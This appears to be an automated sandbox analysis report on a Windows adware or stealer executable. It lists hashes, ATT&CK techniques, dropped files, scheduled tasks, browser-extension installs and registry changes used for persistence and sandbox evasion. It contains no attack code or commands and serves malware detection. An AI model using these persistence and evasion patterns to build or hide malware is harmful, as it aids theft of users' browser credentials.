7e0e41753d443d82da40eba933548b31ce5417559c1d159976322d6ed3050df7

Analysis

max time kernel
148s
max time network
151s
platform
windows10_x64
resource
win10v20210408
submitted
20-06-2021 08:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d0a450955b5c37142aa1fca3f2631a77.exe
Size

6.2MB
MD5

d0a450955b5c37142aa1fca3f2631a77
SHA1

b177c6597e5fab0f19913ee54c521ef5055a6981
SHA256

7e0e41753d443d82da40eba933548b31ce5417559c1d159976322d6ed3050df7
SHA512

8734aa7ba21b31ab116e28e9fba59bcfef71d5031d4f7d57ccc6492a0305700d95b9d489b97f9ba0fb4237e1a7bc7e526be73eb45fe366e2e54739b6cc34b33a

Score

10^/10

adware discovery persistence spyware stealer

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

19 5112 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exeFyAWIxc.exeuHnQBsa.exeBoFVcRu.exe

pid process

5100 SimplInst.exe
3440 SimplInst.exe
2324 FyAWIxc.exe
3060 uHnQBsa.exe
1384 BoFVcRu.exe

flow	pid	process
19	5112	rundll32.exe

pid	process
5100	SimplInst.exe
3440	SimplInst.exe
2324	FyAWIxc.exe
3060	uHnQBsa.exe
1384	BoFVcRu.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

5112 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

uHnQBsa.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini uHnQBsa.exe
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

pid	process
5112	rundll32.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	uHnQBsa.exe

Drops file in System32 directory 17 IoCs

Processes:

powershell.exeFyAWIxc.exepowershell.exepowershell.exepowershell.exepowershell.exeSimplInst.exepowershell.exerundll32.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	FyAWIxc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	FyAWIxc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	rundll32.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Drops file in Program Files directory 64 IoCs

Processes:

uHnQBsa.exe

description	ioc	process
File created	C:\Program Files (x86)\WSPNEpLqQIE\tgZBuA7n.dll	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ja\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pl\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\uk\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_TW\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\Z29V4M.dll	uHnQBsa.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\CiEFwtj.xml	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\icon16.ico	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\be\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\el\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\he\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\vi\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\da\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\fcsvEsvhbcUn\tsiwiyw.dll	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ms\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\lmIJiod.exe	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fa\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\kn\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lt\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\te\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\EBOrehD.xml	uHnQBsa.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\no\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sv\messages.json	uHnQBsa.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\cs\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es_419\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\id\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ml\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\ktTXGKPDP.dll	uHnQBsa.exe
File created	C:\Program Files (x86)\anjFGKdzU\tzqEhV.dll	uHnQBsa.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\de\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_US\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lv\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\nl\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\th\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bn\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fi\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fil\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_CN\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\am\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bg\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ko\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mk\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ro\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ca\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_GB\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\et\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\gu\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hu\messages.json	uHnQBsa.exe
File opened for modification	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_BR\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_PT\messages.json	uHnQBsa.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fr\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\it\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ru\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sr\messages.json	uHnQBsa.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\tr\messages.json	uHnQBsa.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bqZkKdgiyjBiVwZYfn.job	schtasks.exe
File created	C:\Windows\Tasks\jrzNdZzegeVMzeqYf.job	schtasks.exe
File created	C:\Windows\Tasks\JRajWlGIFNTafba.job	schtasks.exe
File created	C:\Windows\Tasks\wNQepEmyQbhZnWiRT.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4812	schtasks.exe
4332	schtasks.exe
4092	schtasks.exe
4956	schtasks.exe
2472	schtasks.exe
4036	schtasks.exe
2232	schtasks.exe
4496	schtasks.exe
4372	schtasks.exe
4720	schtasks.exe
4576	schtasks.exe
3612	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 15 IoCs

adware spyware

Modify Registry

T1112

Processes:

uHnQBsa.exeBoFVcRu.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "lmIJiod.exe"	uHnQBsa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "lmIJiod.exe"	uHnQBsa.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	uHnQBsa.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	uHnQBsa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	uHnQBsa.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd34a540ab345020f9b00e4d923778200	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	uHnQBsa.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\lmIJiod.exe = "9999"	uHnQBsa.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights	uHnQBsa.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Approved Extensions	uHnQBsa.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	BoFVcRu.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	BoFVcRu.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	uHnQBsa.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	uHnQBsa.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	uHnQBsa.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeuHnQBsa.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d05cfc4a-0000-0000-0000-500600000000}	uHnQBsa.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Modifies registry class 64 IoCs

Processes:

uHnQBsa.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tgZBuA7n.dll"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IyFOGQOPsSrjKINQhDMF"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable\	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	uHnQBsa.exe
